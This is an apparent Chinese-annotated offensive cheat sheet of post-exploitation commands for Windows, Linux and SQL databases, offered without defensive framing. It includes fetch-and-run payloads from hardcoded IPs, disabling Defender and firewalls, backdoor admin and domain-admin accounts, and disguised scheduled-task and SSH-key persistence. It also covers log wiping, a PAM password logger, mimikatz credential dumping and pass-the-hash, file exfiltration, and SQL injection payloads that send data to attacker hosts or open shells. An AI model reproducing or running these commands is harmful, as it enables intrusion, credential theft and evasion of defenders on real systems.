powershell Test-NetConnection -ComputerName [目标主机名或IP] -Port [端口号]

certutil.exe -urlcache -split -f "http://127.0.0.1:8080/file.exe" "C:/Windows/temp/file.exe"

//从 http://127.0.0.1:8080/ 下载 file.exe 并保存到 C:/Windows/temp/file.exe

powershell -Command "Invoke-WebRequest -Uri 'https://www.example.com/file.zip' -OutFile 'C:\Downloads\file.zip'"

bitsadmin /transfer "JobName" /download /priority normal https://www.example.com/file.zip C:\path\to\save\file.zip

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.3.150/chfs/shared/1Z3.exe",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

%windir%\system32\inetsrv\appcmd.exe list sites

%windir%\system32\inetsrv\appcmd list site /site.id:1 /config | findstr "physicalPath"

C:\Windows\System32\inetsrv\config\applicationHost.config
%SystemRoot%\System32\inetsrv\config\applicationHost.config

wmic os get Caption,osarchitecture

powershell -command "(Get-Item 'C:\path\to\your\file.txt').CreationTime = '2024-01-01 12:00 AM'; (Get-Item 'C:\path\to\your\file.txt').LastWriteTime = '2024-01-02 12:00 AM'"

netstat -ano | findstr :80

tasklist /FI "PID eq 1234"

wmic process where ProcessId=1234 get ExecutablePath

start /b  xxx.exe

taskkill /f /t /im GotoHTTP.exe

tasklist | findstr "powershell"

powershell -executionPolicy bypass Start-Process -WindowStyle hidden -FilePath 'C:/Windows/temp/rd.exe'

查看用户列表: net user
powershell查看用户列表: Get-WmiObject -Class Win32_UserAccount
查看用户组列表: net localgroup
查看管理组列表: net localgroup Administrators
添加用户并设置密码: net user test P@ssw0rd /add
将用户加入管理组: net localgroup Administrators test /add
将用户加入桌面组: net localgroup "Remote Desktop Users" guest /add
激活guest用户: net user guest /active:yes
更改guest用户的密码: net user guest P@ssw0rd
将用户加入管理组: net localgroup administrators guest /add
将用户加入桌面组: net localgroup "Remote Desktop Users" guest /add
查看本地密码策略: net accounts
查看当前会话: net session
建立IPC会话: net use \\127.0.0.1\c$ "P@ssw0rd" /user:"domain\Administrator"

netsh firewall show config

netsh firewall add allowedprogram C:\nc.exe "allow nc" enable

netsh advfirewall firewall add rule name="pass nc" dir in action=allow program="C:\nc.exe

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

C:\Windows\System32\wbem\wmic.exe /Node:localhost /Namespace:\\Root\Microsoft\Windows\Defender Path MSFT_MpPreference call Add ExclusionPath=C:\

powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:\test"

echo test > C:\test.txt //写入-覆盖
echo test >> c:\test.txt //追加有换行
set /p=test<nul>C:\test.txt //写入
set /p="121d2">>C:\test.txt //不换行追加

//powershell不换行追加
powershell -Command "[System.IO.File]::AppendAllText('C:\windows\temp\111.txt', 'test')"

//规避空格
echo.123>>a.txt
echo,123>>a.txt
type;a.txt

//将base64编码的文件解码写入到 test.jsp
certutil -f -decode base64.txt C:\\test.jsp

//将十六进制文件解码写入到 test.jsp
certutil -decodehex hex.txt C:\\test.jsp

对应命令行开启 Restricted Admin mode 命令如下：
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

查看是否已开启 DisableRestrictedAdmin REG_DWORD 0x0 存在就是开启
REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin"

REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

或者

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv

复制：
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SAM

使用 https://github.com/3gstudent/NinjaCopy 进行复制。

lsadump::sam /sam:sam.hiv /system:system.hiv

## 大小为字节磁盘
::查看C盘
wmic LogicalDisk where "Caption='C:'" get FreeSpace,Size /value
::查看D盘
wmic LogicalDisk where "Caption='D:'" get FreeSpace,Size /value

#搜索 D 盘下名为 shell.jsp 的文件
cd /d D:\ && dir /b /s shell.jsp

#搜素 D 盘下后缀为 conf 内容且包含 password（不区分大小写）:
findstr /s /i /n /d:D:\ "password" *.conf

powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://122.114.55.117:8012/download/upload.ps1')

msiexec /q /i http://127.0.0.1:8080/ms10-051.msi

attrib +s +a +h +r cs.exe // 给文件设置系统文件属性、存档文件属性、隐藏文件属性、只读文件属性

schtasks /create /ru system /tn "Microsoft\Windows\Multimedia\SystemMediaService" /sc ONSTART /tr "C:\cs.exe" 
// 创建一个名为Microsoft\Windows\Multimedia\SystemMediaService，开机时执行 c:\cs.exe 的计 划任务，需要管理员权限

schtasks /change /tn "Microsoft\Windows\Multimedia\SystemSoundsService" /ru system /tr "C:\cs.exe" /enable 
// 修改Microsoft\Windows\Multimedia\SystemSoundsService 计划任务，需要管理员权限， 更改任务无法通过 /sc、/mo 参数更改计划频率

#列出所有 RDP 凭证
C:\Users\用户名\AppData\Local\Microsoft\Credentials

dir /a C:\Users\Administrator\AppData\Local\Microsoft\Credentials

powershell -Command "Compress-Archive -Path E:\update\ -DestinationPath E:\test.zip"

7z.exe a -r -p12345 C:\webs\1.7z C:\webs\

zip -r C:\webs\1.zip C:\webs\

whoami /user  //查看当前用户权限
net config workstation  //可知域名和其他信息
net user /domain  //查询域用户
net user edgeuser Admin12345 /add /domain  //添加域用户
net group "domain admins" edgeuser /add /domain  //添加域管理员
net group "enterprise admins" edgeuser /add /domain  //添加企业管理员
net group "domain admins" /domain  //查询域管理员用户
net group "enterprise admins" /domain  //查询域企业管理组
net localgroup administrators /domain  //查询域本地管理组
net time /domain  //查询域控制器和时间
net view /domain  //查询域名称
net view /domain:redteam.local  //查询域内计算机
net group "domain computers" /domain  //查看当前域内计算机列表
net group "domain controllers" /domain  //查看域控机器名
net accounts /domain  //查看域密码策略
nltest /domain_trusts  //查看域信任
nltest /domain_trusts /all_trusts /v /server:10.10.10.10  //查看某个域的域信任
nslookup -type=SRV _ldap._tcp.corp  //通过srv记录查找域控制器

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

echo > /var/log/btmp;echo > /var/log/wtmp;echo > /var/log/lastlog;echo > /var/log/utmp;echo > /var/log/syslog;cat /dev/null > /var/log/secure;cat /dev/null > /var/log/message;echo ok

直接替换日志ip地址:
sed -i 's/127.0.0.1/192.168.1.1/g' access.log

清除部分相关日志:
使用grep -v来把相关信息删除:
cat /var/log/nginx/access.log | grep -v evil.php > tmp.log

把修改过的日志覆盖到原日志文件:
cat tmp.log > /var/log/nginx/access.log

export https_proxy=http://127.0.0.1:7890 http_proxy=http://127.0.0.1:7890 all_proxy=socks5://127.0.0.1:7890

last

sudo useradd -m testt && echo "testt:admin@123" | sudo chpasswd && sudo usermod -aG wheel testt

wget -P /tmp/ http://x.x.x.x:8080/shell
curl -o /tmp/xxx http://x.x.x.x:8080/shell

curl -X POST --data-binary @file.txt http://localhost:9000

wget --post-file=file.txt http://localhost:9000

curl -T file.txt http://localhost:9000

import socket

def start_server(host, port, buffer_size=1024):
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind((host, port))
    server_socket.listen(5)
    print(f"服务器正在 {host}:{port} 监听...")

    while True:
        client_socket, addr = server_socket.accept()
        print(f"连接来自 {addr}")

        # 读取HTTP请求头
        request = b""
        while b"\r\n\r\n" not in request:
            request += client_socket.recv(buffer_size)

        headers, file_data = request.split(b"\r\n\r\n", 1)

        # 提取文件名（可以根据实际需求修改提取方式）
        file_name = "received_file"  # 默认文件名

        # 保存文件
        with open(file_name, 'wb') as f:
            f.write(file_data)
            while True:
                data = client_socket.recv(buffer_size)
                if not data:
                    break
                f.write(data)

        print(f"文件 {file_name} 已保存")
        client_socket.close()

if __name__ == "__main__":
    HOST = '0.0.0.0'
    PORT = 9000
    start_server(HOST, PORT)

touch -t 202405161200.24 /www/wwwroot/shell.php

cat /etc/resolv.conf

systemctl stop firewalld
service iptables stop

ubuntu:
ufw disable

find / -regex ".*\.properties\|.*\.conf\|.*\.config\|.*\.yaml\|.*\.sh|.*\.jsp|.*\.log|.*\.txt|.*\.xml" | xargs grep -E "=jdbc:|pass=|passwd=|aliyun|password"

//直接 echo 写入：
echo xxx > /www/xxx.jsp

//base64 写入：
echo eHh4ZGFzMQ== | base64 -d > /www/xxx.jsp

//追加
echo xxx >> /www/xxx.jsp

echo c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFEazRVTjhFUTFXOFBWMQ== | base64 -d > authorized_keys

//使用  printf 在末尾处插入，如需换行可添加\n
//参考https://baijiahao.baidu.com/s?id=1727019063436737118&wfr=spider&for=pc

printf "ssh-rsa xxx" >> /root/.ssh/authorized_keys

//将 /home/mail /home/web 两个目录打包至 /tmp 目录下命名为web.tar.gz
tar czvf /tmp/web.tar.gz /home/mail /home/web

//zip
zip -r /tmp/web.zip /home/mail /home/web

//可使用 -x 排除，如:
zip -r /tmp/web.zip /home/mail /home/web -x /home/mail/test.txt -x /home/web/log/*

split -n 3 fscan  //分割为 3 个文件
split -b 500k fscan  //以 500 K 大小分割 fscan

Windows 合并：
copy /b xaa+xab fscan
type xaa xab > fscan

Linux 合并：
cat xaa xab > fscan

# 将文件转换为十六进制
xxd -p filename 

# 本地还原：
xxd -p -r filename > aa.tar.gz

setenforce 0 # 关闭
setenforce 1 # 开启

auth optional pam_exec.so quiet expose_authtok /tmp/sshd.sh

#!/bin/sh

echo "$(date) $PAM_USER $(cat -) $PAM_RHOST $PAM_RUSER" >> /tmp/123.log

apt update
apt upgrade -y
apt install curl vim wget gnupg dpkg apt-transport-https lsb-release ca-certificates

Debian:
curl -sSL https://download.docker.com/linux/debian/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://download.docker.com/linux/debian $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list

Ubuntu:
curl -sSL https://download.docker.com/linux/debian/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list

Debian:
curl -sS https://download.docker.com/linux/debian/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list

Ubuntu:
curl -sS https://download.docker.com/linux/debian/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list

apt update
apt install docker-ce docker-ce-cli containerd.io docker-compose-plugin

curl -L https://github.com/docker/compose/releases/latest/download/docker-compose-Linux-x86_64 > /usr/local/bin/docker-compose
chmod +x /usr/local/bin/docker-compose

ubuntu18运行
sudo apt install openjdk-11-jre-headless
sudo apt install openjdk-11-jdk

手动
tar -xzvf jdk-13.0.2_linux-x64_bin.tar.gz
cd jdk-13.0.2/
pwd
vim /etc/profile

export JAVA_HOME=/root/jdk-13.0.2
export CLASSPATH=$:CLASSPATH:$JAVA_HOME/lib/ export PATH=$PATH:$JAVA_HOME/bin

source /etc/profile

SELECT * FROM performance_schema.hosts;
show full processlist;

select table_name,table_rows,table_schema,table_comment from  information_schema.tables order by table_rows desc;

SELECT 
    TABLE_SCHEMA AS database_name,
    TABLE_NAME AS table_name,
    COLUMN_NAME AS column_name
FROM 
    INFORMATION_SCHEMA.COLUMNS
WHERE 
    COLUMN_NAME LIKE '%user%';

//库名,表名,访问次数
select table_schema,table_name,sum(io_read_requests+io_write_requests) io from sys.schema_table_statistics group by table_schema,table_name order by io desc; 

mysql> show global variables like '%secure%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_auth      | ON    |
| secure_file_priv |          |    可写入
| secure_file_priv | NULL |   不可写入
+------------------+-------+

SHOW VARIABLES LIKE "secure_file_priv";

mysql -uaHmin -proot test -e "select now()" -N >H:/work/target1.txt
mysql -uroot -e "show databases;" >1.txt

显示版本: select version();
显示字符集: select @@character_set_database;
显示数据库: show databases;
显示表名: show tables;
显示字段: show columns from table_name;
显示计算机名: select @@hostname;
系统版本: select @@version_compile_os;
mysql路径: select @@basedir;
数据库路径: select @@datadir;
describe describe table_name;
显示root密码: select User,Password from mysql.user;
导入文件: select load_fie(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C);
导出文件: select 'testtest' into outfile '/var/www/html/test.txt' from mysql.user;
开启外连: GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;
mysql安装路径: show variables;   
更新数据库: UPDATE `DX15`.`dx15_common_member` SET `uid` = '1' WHERE `dx15_common_member`.`uid` =40407;更新40407uid变成uid1
mysql更改root密码: mysqladmin -u root password "newpwd";
查询表: select concat(User,0x3a,Password) from mysql.user; 
获取数据库所有表: SHOW TABLES FROM `databases`;
获取列前20行: SELECT * FROM `admin_bbs` ORDER BY 1 DESC LIMIT 0,20;
获取表行数: SELECT COUNT(*) AS CNT FROM `dede_admin`;

exec master..xp_cmdshell 'whoami';

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';

exec master..sp_dropextendedproc xp_cmdshell;

exec master..xp_dropextendedproc xp_cmdshell,@dllname='xplog70.dll' declare @o int;

# 允许修改高级参数
exec sp_configure 'show advanced options',1;
# 配置生效
RECONFIGURE;
# 开启xp_cmdshell
exec sp_configure 'xp_cmdshell',1;
# 配置生效
RECONFIGURE;
# 检查是否开启
exec sp_configure;
# 执行系统命令
exec master..xp_cmdshell 'whoami';
# 获取webshell
exec master..xp_cmdshell 'echo  ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > c:\\WWW\\test.aspx'

SELECT CURRENT_USER
SELECT user_name();
SELECT system_user;
SELECT user;

SELECT @@version

SELECT HOST_NAME()
SELECT @@hostname
SELECT @@SERVERNAME
SELECT SERVERPROPERTY('productversion')
SELECT SERVERPROPERTY('productlevel')
SELECT SERVERPROPERTY('edition');

SELECT DB_NAME()

SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); — for N = 0, 1, 2, …
SELECT STRING_AGG(name, ', ') FROM master..sysdatabases; -- Change delimeter value such as ', ' to anything else you want => master, tempdb, model, msdb   (Only works in MSSQL 2017+)

SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable

SELECT table_catalog, column_name FROM information_schema.columns

SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable

SELECT table_catalog, table_name FROM information_schema.columns
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; -- Change delimeter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options  (Only works in MSSQL 2017+)

-- extract databases names
$ SELECT name FROM master..sysdatabases
[*] Injection
[*] msdb
[*] tempdb

-- extract tables from Injection database
$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U'
[*] Profiles
[*] Roles
[*] Users

-- extract columns for the table Users
$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')
[*] UserId
[*] UserName

-- Finally extract the data
$ SELECT  UserId, UserName from Users

For integer inputs : convert(int,@@version)
For integer inputs : cast((SELECT @@version) as int)

For string inputs   : ' + convert(int,@@version) + '
For string inputs   : ' + cast((SELECT @@version) as int) + '

AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -

AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97
AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64-- 
AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'

AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90

SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'

WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
SELECT message FROM data WHERE row = 1 and message like 't%'

ProductID=1;waitfor delay '0:0:10'--
ProductID=1);waitfor delay '0:0:10'--
ProductID=1';waitfor delay '0:0:10'--
ProductID=1');waitfor delay '0:0:10'--
ProductID=1));waitfor delay '0:0:10'--

IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';

-1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null

EXEC xp_cmdshell "net user";
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';

EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;

sqsh -S 192.168.1.X -U sa -P superPassword
python mssqlclient.py WORKGROUP/Administrator:[email protected] -port 46758

#Print the user being used (and execute commands)
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
#Open and read a file
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
#Multiline
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
import sys
print(sys.version)
'
GO

# Permissions: Requires VIEW SERVER STATE permission on the server.
1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.xem',null,null))

# Permissions: Requires the CONTROL SERVER permission.
1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\',default,default)))
1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.trc',default))

1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';-- 

xp_dirtree '\\attackerip\file'
xp_fileexist '\\attackerip\file'
BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file'
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file'
RESTORE HEADERONLY FROM DISK = '\\attackerip\file'
RESTORE FILELISTONLY FROM DISK = '\\attackerip\file'
RESTORE LABELONLY FROM DISK = '\\attackerip\file'
RESTORE REWINDONLY FROM DISK = '\\attackerip\file'
RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'

EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;

msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter sessio

-- find link
select * from master..sysservers

-- execute query through the link
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
select version from openquery("linkedserver", 'select @@version as version');

-- chain multiple openquery
select version from openquery("link1",'select version from openquery("link2","select @@version as version")')

-- execute shell commands
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')

-- create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"

SELECT * FROM fn_my_permissions(NULL, 'SERVER'); 

SELECT * FROM fn_my_permissions (NULL, 'DATABASE');

SELECT * FROM fn_my_permissions('Sales.vIndividualCustomer', 'OBJECT') ORDER BY subentity_name, permission_name; 

-- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin
SELECT is_srvrolemember('sysadmin');

-- 'sp_password' was found in the text of this event.
-- The text has been replaced with this comment for security reasons.

select t.table_name,t.tablespace_name,t.owner,t.num_rows from  all_tables t  ORDER BY NUM_ROWS DESC;

select t.table_name,t.tablespace_name,t.owner,t.num_rows from  all_tables t  ORDER BY NUM_ROWS DESC;
select t.table_name tableName, f.comments comments
  from user_tables t
 inner join user_tab_comments f
    on t.table_name = f.table_name

SELECT 
    owner AS database_name,
    table_name,
    column_name
FROM 
    all_tab_columns
WHERE 
    column_name LIKE '%USER%'
ORDER BY 
    owner, table_name, column_name;

SELECT user FROM dual UNION SELECT * FROM v$version
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;

SELECT host_name FROM v$instance; (Privileged)
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
SELECT UTL_INADDR.get_host_address FROM dual;

SELECT global_name FROM global_name;
SELECT name FROM V$DATABASE;
SELECT instance_name FROM V$INSTANCE;
SELECT SYS.DATABASE_NAME FROM DUAL;

SELECT DISTINCT owner FROM all_tables;

SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';

SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';

AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) 

/* create Java class */
BEGIN
EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};';
END;
/

BEGIN
EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';';
END;
/

/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;

/* create Java class */
SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d''));
EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual

/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');

--
/**/

; #用于终止 SQL 命令。在语句中唯一可使用的位置是在字符串常量或引用标识符中。
|| #或语句

# 使用示例: 
/?whatever=1;(select 1 from pg_sleep(5))
/?whatever=1||(select 1 from pg_sleep(5))

SELECT version()

SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();

SELECT usename FROM pg_user

SELECT usename, passwd FROM pg_shadow 

SELECT usename FROM pg_user WHERE usesuper IS TRUE

SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user

SHOW is_superuser; 
SELECT current_setting('is_superuser');
SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;

SELECT current_database()

SELECT datname FROM pg_database

SELECT table_name FROM information_schema.tables

SELECT column_name FROM information_schema.columns WHERE table_name='data_table'

,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)

' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1
' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1

select query_to_xml('select * from pg_user',true,true,''); -- 返回所有结果作为单个 xml 行
select database_to_xml(true,true,''); -- 将当前数据库转储为 XML
select database_to_xmlschema(true,true,''); -- 将当前数据库转储为 XML 架构

' and substr(version(),1,10) = 'PostgreSQL' and '1' -> OK
' and substr(version(),1,10) = 'PostgreXXX' and '1' -> KO

select 1 from pg_sleep(5)
;(select 1 from pg_sleep(5))
||(select 1 from pg_sleep(5))

select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1
select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name limit 1
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name where column_name='value' limit 1

AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))

http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));--

select pg_ls_dir('./');
select pg_read_file('PG_VERSION', 0, 200);

CREATE TABLE pentestlab (t TEXT);
INSERT INTO pentestlab(t) VALUES('nc -lvvp 2346 -e /bin/bash');
SELECT * FROM pentestlab;
COPY pentestlab(t) TO '/tmp/pentestlab';

SELECT CHR(65)||CHR(66)||CHR(67);

SELECT $$This is a string$$
SELECT $TAG$This is another string$TAG$

mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit

privilege::debug
sekurlsa::logonpasswords

mimikatz.exe log "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 /run:cmd.exe" "exit"

mimikatz "privilege::debug"  "sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 /run:mstsc.exe /restrictedadmin" "exit"

privilege::debug
sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 "/run:mstsc.exe /restrictedadmin"

mimikatz "log" "lsadump::sam /sam:sam.hive /system:system.hive"  "exit"

@echo off
cd /d D:\tools\
